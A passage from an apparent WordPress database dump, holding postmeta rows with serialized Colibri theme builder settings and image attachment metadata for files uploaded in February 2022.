sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(455,330,'is_colibri-wp_front_page','1'),(456,330,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:15:{i:0;i:228;i:1;i:271;i:2;i:272;i:3;i:273;i:4;i:274;i:5;i:275;i:6;i:276;i:7;i:273;i:8;i:274;i:9;i:275;i:10;i:276;i:11;i:273;i:12;i:274;i:13;i:275;i:14;i:276;}}}'),(457,332,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(462,337,'is_colibri-wp_front_page','1'),(463,337,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:15:{i:0;i:228;i:1;i:271;i:2;i:272;i:3;i:273;i:4;i:274;i:5;i:275;i:6;i:276;i:7;i:273;i:8;i:274;i:9;i:275;i:10;i:276;i:11;i:273;i:12;i:274;i:13;i:275;i:14;i:276;}}}'),(464,339,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(468,343,'_wp_attached_file','2022/02/visuals-0RPf107BLek-unsplash.jpg'),(469,343,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:12500;s:6:\"height\";i:8334;s:4:\"file\";s:40:\"2022/02/visuals-0RPf107BLek-unsplash.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(470,346,'_wp_attached_file','2022/02/cdc.jpg'),(471,346,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1780;s:6:\"height\";i:1177;s:4:\"file\";s:15:\"2022/02/cdc.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"cdc-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"cdc-1024x677.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:677;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"cdc-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"cdc-768x508.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:17:\"cdc-1536x1016.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1016;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(475,351,'_wp_attached_file','2022/02/cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp'),(476,351,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1365;s:6:\"height\";i:1365;s:4:\"file\";s:75:\"2022/02/cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:75:\"cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";}s:5:\"large\";a:4:{s:4:\"file\";s:77:\"cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1024x1024.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:75:\"cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:75:\"cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-768x768.webp\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/webp\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(477,352,'_wp_attached_file','2022/02/colibri-image-381.png'),(478,352,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1280;s:4:\"file\";s:29:\"2022/02/colibri-image-381.png\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"colibri-image-381-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"colibri-image-381-1024x683.png\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"colibri-image-381-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"colibri-image-381-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:31:\"colibri-image-381-1536x1024.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(479,122,'_wp_page_template','page-templates/full-width-page.php'),(480,122,'extend_builder','a:2:{s:4:\"json\";i:353;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:14:{i:0;i:280;i:1;i:285;i:2;i:286;i:3;i:287;i:4;i:288;i:5;i:289;i:6;i:290;i:7;i:291;i:8;i:292;i:9;i:293;i:10;i:294;i:11;i:295;i:12;i:296;i:13;i:298;}}}'),(481,354,'extend_builder','a:1:{s:4:\"json\";i:353;}'),(487,361,'extend_builder','a:2:{s:4:\"json\";i:353;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:18:{i:0;i:280;i:1;i:285;i:2;i:286;i:3;i:287;i:4;i:288;i:5;i:289;i:6;i:290;i:7;i:291;i:8;i:292;i:9;i:293;i:10;i:294;i:11;i:295;i:12;i:296;i:13;i:298;i:14;i:314;i:15;i:317;i:16;i:318;i:17;i:319;}}}'),(493,368,'extend_builder','a:2:{s:4:\"json\";i:353;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:280;i:1;i:285;i:2;i:286;i:3;i:287;i:4;i:288;i:5;i:289;i:6;i:290;i:7;i:291;i:8;i:292;i:9;i:293;i:10;i:294;i:11;i:295;i:12;i:296;i:13;i:298;i:14;i:314;i:15;i:321;i:16;i:322;i:17;i:324;i:18;i:317;i:19;i:318;i:20;i:319;}}}'),(499,375,'is_colibri-wp_front_page','1'),(500,375,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:15:{i:0;i:228;i:1;i:271;i:2;i:272;i:3;i:273;i:4;i:274;i:5;i:275;i:6;i:276;i:7;i:273;i:8;i:274;i:9;i:275;i:10;i:276;i:11;i:273;i:12;i:274;i:13;i:275;i:14;i:276;}}}'),(501,377,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(506,382,'is_colibri-wp_front_page','1'),(507,382,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:15:{i:0;i:228;i:1;i:271;i:2;i:272;i:3;i:273;i:4;i:274;i:5;i:275;i:6;i:276;i:7;i:273;i:8;i:274;i:9;i:275;i:10;i:276;i:11;i:273;i:12;i:274;i:13;i:275;i:14;i:276;}}}'),(508,384,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(513,389,'extend_builder','a:2:{s:4:\"json\";i:353;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:280;i:1;i:285;i:2;i:286;i:3;i:287;i:4;i:288;i:5;i:289;i:6;i:290;i:7;i:291;i:8;i:292;i:9;i:293;i:10;i:294;i:11;i:295;i:12;i:296;i:13;i:298;i:14;i:314;i:15;i:321;i:16;i:322;i:17;i:324;i:18;i:317;i:19;i:318;i:20;i:319;}}}'),(519,396,'is_colibri-wp_front_page','1'),(520,396,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:15:{i:0;i:228;i:1;i:271;i:2;i:272;i:3;i:273;i:4;i:274;i:5;i:275;i:6;i:276;i:7;i:273;i:8;i:274;i:9;i:275;i:10;i:276;i:11;i:273;i:12;i:274;i:13;i:275;i:14;i:276;}}}'),(521,398,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(526,403,'is_colibri-wp_front_page','1'),(527,403,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:17:{i:0;i:228;i:1;i:271;i:2;i:272;i:3;i:273;i:4;i:274;i:5;i:275;i:6;i:276;i:7;i:273;i:8;i:274;i:9;i:275;i:10;i:276;i:11;i:273;i:12;i:274;i:13;i:275;i:14;i:276;i:15;i:329;i:16;i:330;}}}'),(528,405,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(533,410,'is_colibri-wp_front_page','1'),(534,410,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:228;i:1;i:271;i:2;i:335;i:3;i:336;i:4;i:337;i:5;i:331;i:6;i:333;i:7;i:334;i:8;i:272;i:9;i:273;i:10;i:274;i:11;i:275;i:12;i:276;i:13;i:273;i:14;i:274;i:15;i:275;i:16;i:276;i:17;i:273;i:18;i:274;i:19;i:275;i:20;i:276;}}}'),(535,412,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(558,430,'_wp_attached_file','2022/02/ewsimage.png'),(559,430,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:691;s:6:\"height\";i:379;s:4:\"file\";s:20:\"2022/02/ewsimage.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"ewsimage-300x165.png\";s:5:\"width\";i:300;s:6:\"height\";i:165;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"ewsimage-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(562,432,'_wp_attached_file','2022/02/cropped-ewsimage.png'),(563,432,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:412;s:6:\"height\";i:379;s:4:\"file\";s:28:\"2022/02/cropped-ewsimage.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"cropped-ewsimage-300x276.png\";s:5:\"width\";i:300;s:6:\"height\";i:276;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"cropped-ewsimage-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(564,433,'_wp_attached_file','2022/02/Unweighted-Monday.png'),(565,433,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4425;s:6:\"height\";i:2375;s:4:\"file\";s:29:\"2022/02/Unweighted-Monday.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Unweighted-Monday-300x161.png\";s:5:\"width\";i:300;s:6:\"height\";i:161;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"Unweighted-Monday-1024x550.png\";s:5:\"width\";i:1024;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Unweighted-Monday-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"Unweighted-Monday-768x412.png\";s:5:\"width\";i:768;s:6:\"height\";i:412;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:30:\"Unweighted-Monday-1536x824.png\";s:5:\"width\";i:1536;s:6:\"height\";i:824;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:31:\"Unweighted-Monday-2048x1099.png\";s:5:\"width\";i:2048;s:6:\"height\";i:1099;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(566,434,'_wp_attached_file','2022/02/word-cloud.png'),(567,434,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2276;s:6:\"height\";i:1200;s:4:\"file\";s:22:\"2022/02/word-cloud.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"word-cloud-300x158.png\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"word-cloud-1024x540.png\";s:5:\"width\";i:1024